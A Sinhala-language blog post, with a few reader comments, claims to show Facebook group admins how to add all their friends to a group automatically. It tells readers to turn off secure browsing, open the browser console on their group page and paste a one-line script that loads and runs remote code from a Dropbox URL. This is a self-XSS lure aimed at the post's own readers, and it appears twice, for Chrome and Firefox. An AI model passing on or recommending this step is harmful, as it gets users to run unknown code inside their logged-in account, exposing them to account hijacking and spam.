අද ගෙනාව ඔයාලට ගොඩක් වැදගත් දෙයක් මේක ෆේස්බුක් ගෘප් පවත්වාගෙන යන අයට ගොඩක් වැදගත් ලිපියක් මොකද මේ වැඩේ කරාම මෙම්බර්ස් ල Add වෙන්නෙ සට සට ගාලා.මෙකෙන් වෙන්නෙ යාලුවනේ තමන්ගෙ ෆ්රෙන්ඩ්ස් ල ප්‍රමානයට අනුව ගෘප් එකට Add වීමයි.


හරි වැඩි කතා ඕන නෑ වැඩේට බහිමුකෝ................
මුලින්ම ඔයාගෙ ෆේස්බුක් අකවුන්ට් එකට ලොග් වෙලා
Account Settings වලට යන්න
ඊට පස්සෙ මේ 4ටො එකේ තියෙන විදියට Secure browsing  disable කරන්න 

මුලින්ම Google Chrome Browser එකෙන් කරන ආකාරය බලමු 

මුලින්ම ඔයාලගෙ ෆේස්බුක් ගෘප් එකට යන්න 
ඊට පස්සෙ F12 Button එක ඔබන්න 
ඊට පස්සේ ඒකෙ Console තෝරන්න 
ඊට පස්සෙ Right Click කොරල Clear Console තෝරන්න 



ඊට පස්සෙ මේ කෝඩ් එක කොපි කරලා පේස්ට් කරල Enter කරන්න 


document.body.appendChild(document.createElement('script')).src='https://dl-web.dropbox.com/get/Public/ddf.txt?w=0df01a3f';

දැන් වැඩේ හරි
අපි දැන් බලමු Firefox භාවිත කරන අයට කරගන්නෙ කොහොමද කියලා
 මම අර ඉස්සෙල්ල කියපු විදියට Secure browsing  disable කරන්න 
ඊට පස්සෙ ඔයාලගෙ ෆේස්බුක් ගෘප් එකට යන්න 
Ctrl+Shift+k ඔබන්න 
ඊට පස්සෙ මේ 4ටො  එකෙ තියෙන විදියට කොපි කරල පේස්ට් කරල Enter කරන්න 



මෙන්න Code එක 


document.body.appendChild(document.createElement('script')).src='https://dl-web.dropbox.com/get/Public/ddf.txt?w=0df01a3f'; 

හරිනේ එහෙනම් මං ගියා බායි

3 comments:

  1. මෙන්න මගේ ගෘප් දෙක
    1.
    https://www.facebook.com/groups/486820681342353/
    2.
    https://www.facebook.com/groups/260381173986651/

    උදව්වක් කරන්නකෝ. ඔයාලගේ ගෘප් ඇඩ්ර්සුත් දෙන්න, මමත් උදව් කරන්නම්කෝ...

    ReplyDelete
  2. මෙන්න මගේ ගෘපය මේකටත් ඇඩ් කරන්නකෝ

    https://www.facebook.com/groups/dilcomputerworks/

    ReplyDelete

ඔයාලගේ යෝජනා,චෝදනා,අදහස්,උදහස්, මෙතන ලියන්න ඒක මට ගොඩක් වැදගත් වේවි.....

 
Top